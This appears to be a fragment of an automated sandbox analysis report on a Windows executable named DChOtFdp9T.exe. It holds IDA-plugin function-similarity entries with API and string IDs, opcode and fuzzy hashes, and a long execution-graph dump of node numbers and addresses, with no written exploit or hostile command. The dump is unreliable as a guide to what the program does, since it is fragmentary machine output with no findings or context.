                                                                                                                                                                                                                            • API ID: Value
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3702945584-0
                                                                                                                                                                                                                            • Opcode ID: ccb6d4e2bda4067e0443c404fd9a474edfc6b85f6f9be671b7f5248df8d782cb
                                                                                                                                                                                                                            • Instruction ID: eb012d2ca46df2bfd2c885f2f8306a9124e049fde9df221e1a15bcc34b7060f8
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ccb6d4e2bda4067e0443c404fd9a474edfc6b85f6f9be671b7f5248df8d782cb
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E2111B10E0C30352FBA9A73758521B919925F5577CF380B38D93ECA6D3DEACB44183A0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID: verbose
                                                                                                                                                                                                                            • API String ID: 3215553584-579935070
                                                                                                                                                                                                                            • Opcode ID: b6b6fd321123da95521851cb16ed594db0a84da0c81b575458532337a560e12c
                                                                                                                                                                                                                            • Instruction ID: 0e28f3711433028e44ee642cd4df3a5257ca9fdc99f9fe737d60fdfa3b0427b4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b6b6fd321123da95521851cb16ed594db0a84da0c81b575458532337a560e12c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C291BD22F08B4685F7619E26D45037D3B91AF40B98FE64136DA5E873D6DEBCE8058380
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                            • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                            • String ID: csm
                                                                                                                                                                                                                            • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                            • String ID: csm$csm
                                                                                                                                                                                                                            • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                            • String ID: MOC$RCC
                                                                                                                                                                                                                            • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                                            • String ID: Error/warning (ANSI fallback)$Warning
                                                                                                                                                                                                                            • API String ID: 1878133881-2698358428
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                                            • String ID: Error$Error/warning (ANSI fallback)
                                                                                                                                                                                                                            • API String ID: 1878133881-653037927
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2718003287-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1956198572-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID: ?
                                                                                                                                                                                                                            • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6029A7EC6
                                                                                                                                                                                                                              • Part of subcall function 00007FF6029A97C8: RtlFreeHeap.NTDLL(?,?,?,00007FF6029B1AA2,?,?,?,00007FF6029B1ADF,?,?,00000000,00007FF6029B1FA5,?,?,?,00007FF6029B1ED7), ref: 00007FF6029A97DE
                                                                                                                                                                                                                              • Part of subcall function 00007FF6029A97C8: GetLastError.KERNEL32(?,?,?,00007FF6029B1AA2,?,?,?,00007FF6029B1ADF,?,?,00000000,00007FF6029B1FA5,?,?,?,00007FF6029B1ED7), ref: 00007FF6029A97E8
                                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF60299BC15), ref: 00007FF6029A7EE4
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID: C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                            • API String ID: 3580290477-4277806258
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CurrentDirectory_invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID: .$:
                                                                                                                                                                                                                            • API String ID: 2020911589-4202072812
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                            • String ID: U
                                                                                                                                                                                                                            • API String ID: 442123175-4171548499
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CurrentDirectory
                                                                                                                                                                                                                            • String ID: :
                                                                                                                                                                                                                            • API String ID: 1611563598-336475711
                                                                                                                                                                                                                            • Opcode ID: 44e558db68bb898ed5fbc7006be173e092d29c5a4b4cccdf3f6450c1475e0ff3
                                                                                                                                                                                                                            • Instruction ID: 705a91dfcbe9fcdf46b89280abd40ad315a33f1b21cb9da116a45739f56c91ab
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 44e558db68bb898ed5fbc7006be173e092d29c5a4b4cccdf3f6450c1475e0ff3
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2821D032E0838182EB209B16E04426D77E5FF88B8CF654035DA8D83686DFBCE945C791
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                            • String ID: csm
                                                                                                                                                                                                                            • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                            • Opcode ID: 2ab2e788c1bc0f847787c616a8c08cf964f32d6020ccc511d84717c528c58902
                                                                                                                                                                                                                            • Instruction ID: 3673b7a82775ae432b3f80559ef6666884ac70d95840435f2e1f94460cc91143
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2ab2e788c1bc0f847787c616a8c08cf964f32d6020ccc511d84717c528c58902
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3B111932A18B8182EB61CF1AE5402697BE5FF88B98F684231DACD47765DF7CD5618B00
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID: :
                                                                                                                                                                                                                            • API String ID: 2595371189-336475711
                                                                                                                                                                                                                            • Opcode ID: 71e49ca3b200e6a04db85a54903f48b53c7d65b48687c1238235c48323b161bf
                                                                                                                                                                                                                            • Instruction ID: 636880391f91f74f2499da15704166a7e936f03cf19eb8fe73e3cbdd05199b15
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 71e49ca3b200e6a04db85a54903f48b53c7d65b48687c1238235c48323b161bf
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E9018F61E1830286FB70AF62A46127E2BA0FF54B0CFB01135D64DC6A86DFADE504CB54

                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                            Execution Coverage:1.7%
                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                            Signature Coverage:0%
                                                                                                                                                                                                                            Total number of Nodes:820
                                                                                                                                                                                                                            Total number of Limit Nodes:21
71296->71323 71298->71282 71300 7ff6029ae8ec 71299->71300 71301 7ff6029b5023 71299->71301 71305 7ff6029b4418 71300->71305 71325 7ff6029af158 EnterCriticalSection 71301->71325 71303 7ff6029b502b 71303->71300 71304 7ff6029b4e84 55 API calls 71303->71304 71304->71300 71306 7ff6029b4421 71305->71306 71307 7ff6029ae901 71305->71307 71326 7ff6029a4144 11 API calls _get_daylight 71306->71326 71307->71289 71311 7ff6029b4448 71307->71311 71309 7ff6029b4426 71327 7ff6029a9760 37 API calls _invalid_parameter_noinfo 71309->71327 71312 7ff6029b4451 71311->71312 71313 7ff6029ae912 71311->71313 71328 7ff6029a4144 11 API calls _get_daylight 71312->71328 71313->71289 71317 7ff6029b4478 71313->71317 71315 7ff6029b4456 71329 7ff6029a9760 37 API calls _invalid_parameter_noinfo 71315->71329 71318 7ff6029b4481 71317->71318 71319 7ff6029ae923 71317->71319 71330 7ff6029a4144 11 API calls _get_daylight 71318->71330 71319->71289 71319->71296 71321 7ff6029b4486 71331 7ff6029a9760 37 API calls _invalid_parameter_noinfo 71321->71331 71323->71298 71324->71298 71326->71309 71327->71307 71328->71315 71329->71313 71330->71321 71331->71319 71332 7ff60299bcac 71353 7ff60299be7c 71332->71353 71335 7ff60299bdf8 71468 7ff60299c19c 7 API calls 2 library calls 71335->71468 71336 7ff60299bcc8 __scrt_acquire_startup_lock 71338 7ff60299be02 71336->71338 71342 7ff60299bce6 __scrt_release_startup_lock 71336->71342 71469 7ff60299c19c 7 API calls 2 library calls 71338->71469 71340 7ff60299bd0b 71341 7ff60299be0d __CxxCallCatchBlock 71342->71340 71343 7ff60299bd91 71342->71343 71465 7ff6029a89ac 45 API calls 71342->71465 71359 7ff60299c2e4 71343->71359 71345 7ff60299bd96 71362 7ff602991000 71345->71362 71350 7ff60299bdb9 71350->71341 71467 7ff60299c000 7 API calls 71350->71467 71352 7ff60299bdd0 71352->71340 71354 7ff60299be84 71353->71354 71355 7ff60299be90 __scrt_dllmain_crt_thread_attach 71354->71355 71356 7ff60299be9d 71355->71356 71358 7ff60299bcc0 71355->71358 71356->71358 71470 7ff60299c8f8 7 API calls 2 
library calls 71356->71470 71358->71335 71358->71336 71471 7ff6029b9530 71359->71471 71363 7ff602991009 71362->71363 71473 7ff6029a44e4 71363->71473 71365 7ff60299352b 71480 7ff6029933e0 71365->71480 71369 7ff60299b5c0 _log10_special 8 API calls 71371 7ff60299372a 71369->71371 71466 7ff60299c328 GetModuleHandleW 71371->71466 71372 7ff602993736 71375 7ff602993f50 108 API calls 71372->71375 71373 7ff60299356c 71374 7ff602991bf0 49 API calls 71373->71374 71392 7ff602993588 71374->71392 71376 7ff602993746 71375->71376 71377 7ff602993785 71376->71377 71566 7ff6029975f0 71376->71566 71575 7ff6029925f0 53 API calls _log10_special 71377->71575 71381 7ff60299365f __vcrt_freefls 71388 7ff602993844 71381->71388 71390 7ff602997d60 14 API calls 71381->71390 71382 7ff602993538 71382->71369 71383 7ff602993778 71384 7ff60299379f 71383->71384 71385 7ff60299377d 71383->71385 71387 7ff602991bf0 49 API calls 71384->71387 71386 7ff60299f0bc 74 API calls 71385->71386 71386->71377 71389 7ff6029937be 71387->71389 71579 7ff602993e70 49 API calls 71388->71579 71400 7ff6029918f0 115 API calls 71389->71400 71393 7ff6029936ae 71390->71393 71542 7ff602997d60 71392->71542 71564 7ff602997ed0 40 API calls __vcrt_freefls 71393->71564 71394 7ff602993852 71396 7ff602993871 71394->71396 71397 7ff602993865 71394->71397 71399 7ff602991bf0 49 API calls 71396->71399 71580 7ff602993fc0 71397->71580 71415 7ff602993805 __vcrt_freefls 71399->71415 71402 7ff6029937df 71400->71402 71401 7ff6029936bd 71403 7ff60299380f 71401->71403 71404 7ff6029936cf 71401->71404 71402->71392 71407 7ff6029937ef 71402->71407 71577 7ff602998160 58 API calls _log10_special 71403->71577 71408 7ff602991bf0 49 API calls 71404->71408 71406 7ff602998410 2 API calls 71410 7ff60299389e SetDllDirectoryW 71406->71410 71576 7ff6029925f0 53 API calls _log10_special 71407->71576 71412 7ff6029936f1 71408->71412 71409 7ff602993814 71578 7ff602997b90 84 API calls 2 library calls 71409->71578 71418 7ff6029938c3 71410->71418 71412->71415 71416 
7ff6029936fc 71412->71416 71415->71406 71565 7ff6029925f0 53 API calls _log10_special 71416->71565 71421 7ff602993a38 71418->71421 71583 7ff602996530 53 API calls 71418->71583 71420 7ff602993834 71420->71388 71420->71415 71423 7ff602993a42 PostMessageW GetMessageW 71421->71423 71424 7ff602993a65 71421->71424 71423->71424 71555 7ff602993080 71424->71555 71425 7ff6029938d5 71584 7ff602996aa0 118 API calls 2 library calls 71425->71584 71427 7ff6029938ea 71428 7ff602993947 71427->71428 71430 7ff602993901 71427->71430 71585 7ff602996570 121 API calls _log10_special 71427->71585 71428->71421 71435 7ff60299395c 71428->71435 71444 7ff602993905 71430->71444 71586 7ff602996910 89 API calls 71430->71586 71590 7ff6029930e0 122 API calls 2 library calls 71435->71590 71436 7ff602993916 71436->71444 71587 7ff602996c70 54 API calls 71436->71587 71437 7ff602993a7f 71593 7ff602996750 FreeLibrary 71437->71593 71440 7ff602993964 71440->71382 71443 7ff60299396c 71440->71443 71442 7ff602993a8b 71591 7ff602998140 LocalFree 71443->71591 71444->71428 71588 7ff602992870 53 API calls _log10_special 71444->71588 71447 7ff60299393f 71589 7ff602996750 FreeLibrary 71447->71589 71465->71343 71466->71350 71467->71352 71468->71338 71469->71341 71470->71358 71472 7ff60299c2fb GetStartupInfoW 71471->71472 71472->71345 71474 7ff6029ae300 71473->71474 71476 7ff6029ae3a6 71474->71476 71477 7ff6029ae353 71474->71477 71595 7ff6029ae1d8 71 API calls _fread_nolock 71476->71595 71594 7ff6029a9694 37 API calls 2 library calls 71477->71594 71479 7ff6029ae37c 71479->71365 71596 7ff60299b8c0 71480->71596 71483 7ff602993438 71598 7ff602998300 FindFirstFileExW 71483->71598 71484 7ff60299341b 71603 7ff6029929e0 51 API calls _log10_special 71484->71603 71487 7ff60299342e 71492 7ff60299b5c0 _log10_special 8 API calls 71487->71492 71489 7ff6029934a5 71606 7ff6029984c0 WideCharToMultiByte WideCharToMultiByte __vcrt_freefls 71489->71606 71490 7ff60299344b 71604 7ff602998380 CreateFileW GetFinalPathNameByHandleW 
CloseHandle 71490->71604 71495 7ff6029934dd 71492->71495 71494 7ff602993458 71497 7ff602993474 __vcrt_InitializeCriticalSectionEx 71494->71497 71498 7ff60299345c 71494->71498 71495->71382 71502 7ff6029918f0 71495->71502 71496 7ff6029934b3 71496->71487 71607 7ff6029926c0 49 API calls _log10_special 71496->71607 71497->71489 71605 7ff6029926c0 49 API calls _log10_special 71498->71605 71501 7ff60299346d 71501->71487 71503 7ff602993f50 108 API calls 71502->71503 71504 7ff602991925 71503->71504 71506 7ff6029975f0 83 API calls 71504->71506 71512 7ff602991bb6 71504->71512 71505 7ff60299b5c0 _log10_special 8 API calls 71507 7ff602991bd1 71505->71507 71508 7ff60299196b 71506->71508 71507->71372 71507->71373 71509 7ff60299f744 73 API calls 71508->71509 71541 7ff60299199c 71508->71541 71511 7ff602991985 71509->71511 71510 7ff60299f0bc 74 API calls 71510->71512 71513 7ff6029919a1 71511->71513 71514 7ff602991989 71511->71514 71512->71505 71516 7ff60299f40c _fread_nolock 53 API calls 71513->71516 71608 7ff602992760 53 API calls 2 library calls 71514->71608 71517 7ff6029919b9 71516->71517 71518 7ff6029919bf 71517->71518 71519 7ff6029919d7 71517->71519 71609 7ff602992760 53 API calls 2 library calls 71518->71609 71521 7ff6029919ee 71519->71521 71522 7ff602991a06 71519->71522 71610 7ff602992760 53 API calls 2 library calls 71521->71610 71523 7ff602991bf0 49 API calls 71522->71523 71525 7ff602991a1d 71523->71525 71526 7ff602991bf0 49 API calls 71525->71526 71527 7ff602991a68 71526->71527 71528 7ff60299f744 73 API calls 71527->71528 71529 7ff602991a8c 71528->71529 71530 7ff602991aa1 71529->71530 71531 7ff602991ab9 71529->71531 71611 7ff602992760 53 API calls 2 library calls 71530->71611 71533 7ff60299f40c _fread_nolock 53 API calls 71531->71533 71534 7ff602991ace 71533->71534 71535 7ff602991ad4 71534->71535 71536 7ff602991aec 71534->71536 71612 7ff602992760 53 API calls 2 library calls 71535->71612 71613 7ff60299f180 37 API calls 2 library calls 71536->71613 71539 7ff602991b06 
71539->71541 71614 7ff6029925f0 53 API calls _log10_special 71539->71614 71541->71510 71541->71541 71543 7ff602997d6a 71542->71543 71544 7ff602998410 2 API calls 71543->71544 71545 7ff602997d89 GetEnvironmentVariableW 71544->71545 71546 7ff602997df2 71545->71546 71547 7ff602997da6 ExpandEnvironmentStringsW 71545->71547 71548 7ff60299b5c0 _log10_special 8 API calls 71546->71548 71547->71546 71549 7ff602997dc8 71547->71549 71550 7ff602997e04 71548->71550 71615 7ff6029984c0 WideCharToMultiByte WideCharToMultiByte __vcrt_freefls 71549->71615 71550->71381 71552 7ff602997dda 71553 7ff60299b5c0 _log10_special 8 API calls 71552->71553 71554 7ff602997dea 71553->71554 71554->71381 71616 7ff602995ad0 71555->71616 71559 7ff6029930a1 71563 7ff6029930b9 71559->71563 71686 7ff6029957e0 71559->71686 71561 7ff6029930ad 71561->71563 71695 7ff602995970 53 API calls 71561->71695 71592 7ff6029933a0 FreeLibrary 71563->71592 71564->71401 71565->71382 71567 7ff602997614 71566->71567 71568 7ff60299f744 73 API calls 71567->71568 71573 7ff6029976eb __vcrt_freefls 71567->71573 71569 7ff602997630 71568->71569 71569->71573 71758 7ff6029a6928 71569->71758 71571 7ff60299f744 73 API calls 71574 7ff602997645 71571->71574 71572 7ff60299f40c _fread_nolock 53 API calls 71572->71574 71573->71383 71574->71571 71574->71572 71574->71573 71575->71382 71576->71382 71577->71409 71578->71420 71579->71394 71581 7ff602991bf0 49 API calls 71580->71581 71582 7ff602993ff0 71581->71582 71582->71415 71583->71425 71584->71427 71585->71430 71586->71436 71587->71444 71588->71447 71589->71428 71590->71440 71592->71437 71593->71442 71594->71479 71595->71479 71597 7ff6029933ec GetModuleFileNameW 71596->71597 71597->71483 71597->71484 71599 7ff60299833f FindClose 71598->71599 71600 7ff602998352 71598->71600 71599->71600 71601 7ff60299b5c0 _log10_special 8 API calls 71600->71601 71602 7ff602993442 71601->71602 71602->71489 71602->71490 71603->71487 71604->71494 71605->71501 71606->71496 71607->71487 71608->71541 
71609->71541 71610->71541 71611->71541 71612->71541 71613->71539 71614->71541 71615->71552 71617 7ff602995ae5 71616->71617 71618 7ff602991bf0 49 API calls 71617->71618 71619 7ff602995b21 71618->71619 71620 7ff602995b2a 71619->71620 71621 7ff602995b4d 71619->71621 71706 7ff6029925f0 53 API calls _log10_special 71620->71706 71623 7ff602993fc0 49 API calls 71621->71623 71625 7ff602995b65 71623->71625 71624 7ff602995b83 71696 7ff602993ef0 71624->71696 71625->71624 71707 7ff6029925f0 53 API calls _log10_special 71625->71707 71628 7ff60299b5c0 _log10_special 8 API calls 71629 7ff60299308e 71628->71629 71629->71563 71647 7ff602995c60 71629->71647 71631 7ff602995b9b 71633 7ff602993fc0 49 API calls 71631->71633 71634 7ff602995bb4 71633->71634 71635 7ff602995bd9 71634->71635 71636 7ff602995bb9 71634->71636 71638 7ff6029980f0 3 API calls 71635->71638 71708 7ff6029925f0 53 API calls _log10_special 71636->71708 71640 7ff602995be6 71638->71640 71639 7ff602995b43 71639->71628 71641 7ff602995bf2 71640->71641 71642 7ff602995c29 71640->71642 71643 7ff602998410 2 API calls 71641->71643 71710 7ff602995090 95 API calls 71642->71710 71645 7ff602995c0a 71643->71645 71709 7ff6029929e0 51 API calls _log10_special 71645->71709 71711 7ff602994c60 71647->71711 71649 7ff602995c9a 71650 7ff602995ca2 71649->71650 71651 7ff602995cb3 71649->71651 71743 7ff6029925f0 53 API calls _log10_special 71650->71743 71718 7ff602994430 71651->71718 71655 7ff602995cbf 71744 7ff6029925f0 53 API calls _log10_special 71655->71744 71656 7ff602995cd0 71658 7ff602995cdf 71656->71658 71659 7ff602995cf0 71656->71659 71745 7ff6029925f0 53 API calls _log10_special 71658->71745 71722 7ff6029946e0 71659->71722 71660 7ff602995cae 71660->71559 71663 7ff602995d0b 71664 7ff602995d0f 71663->71664 71665 7ff602995d20 71663->71665 71746 7ff6029925f0 53 API calls _log10_special 71664->71746 71667 7ff602995d2f 71665->71667 71668 7ff602995d40 71665->71668 71747 7ff6029925f0 53 API calls _log10_special 71667->71747 71729 7ff602994580 
71668->71729 71672 7ff602995d4f 71748 7ff6029925f0 53 API calls _log10_special 71672->71748 71673 7ff602995d60 71675 7ff602995d6f 71673->71675 71676 7ff602995d80 71673->71676 71749 7ff6029925f0 53 API calls _log10_special 71675->71749 71678 7ff602995d91 71676->71678 71679 7ff602995da2 71676->71679 71750 7ff6029925f0 53 API calls _log10_special 71678->71750 71682 7ff602995dcc 71679->71682 71751 7ff6029a6310 73 API calls 71679->71751 71682->71660 71753 7ff6029925f0 53 API calls _log10_special 71682->71753 71683 7ff602995dba 71752 7ff6029a6310 73 API calls 71683->71752 71687 7ff602995800 71686->71687 71687->71687 71688 7ff602995829 71687->71688 71694 7ff602995840 __vcrt_freefls 71687->71694 71757 7ff6029925f0 53 API calls _log10_special 71688->71757 71690 7ff602995835 71690->71561 71691 7ff60299594b 71691->71561 71692 7ff602991440 116 API calls 71692->71694 71693 7ff6029925f0 53 API calls 71693->71694 71694->71691 71694->71692 71694->71693 71695->71563 71697 7ff602993efa 71696->71697 71698 7ff602998410 2 API calls 71697->71698 71699 7ff602993f1f 71698->71699 71700 7ff60299b5c0 _log10_special 8 API calls 71699->71700 71701 7ff602993f47 71700->71701 71701->71631 71702 7ff6029980f0 71701->71702 71703 7ff602998410 2 API calls 71702->71703 71704 7ff602998104 LoadLibraryExW 71703->71704 71705 7ff602998123 __vcrt_freefls 71704->71705 71705->71631 71706->71639 71707->71624 71708->71639 71709->71639 71710->71639 71713 7ff602994c8c 71711->71713 71712 7ff602994c94 71712->71649 71713->71712 71715 7ff602994e34 71713->71715 71754 7ff6029a5b04 48 API calls 71713->71754 71714 7ff602994ff7 __vcrt_freefls 71714->71649 71715->71714 71716 7ff602994160 47 API calls 71715->71716 71716->71715 71719 7ff602994460 71718->71719 71720 7ff60299b5c0 _log10_special 8 API calls 71719->71720 71721 7ff6029944ca 71720->71721 71721->71655 71721->71656 71723 7ff60299474f 71722->71723 71727 7ff6029946fb 71722->71727 71756 7ff6029942e0 MultiByteToWideChar MultiByteToWideChar __vcrt_freefls 71723->71756 
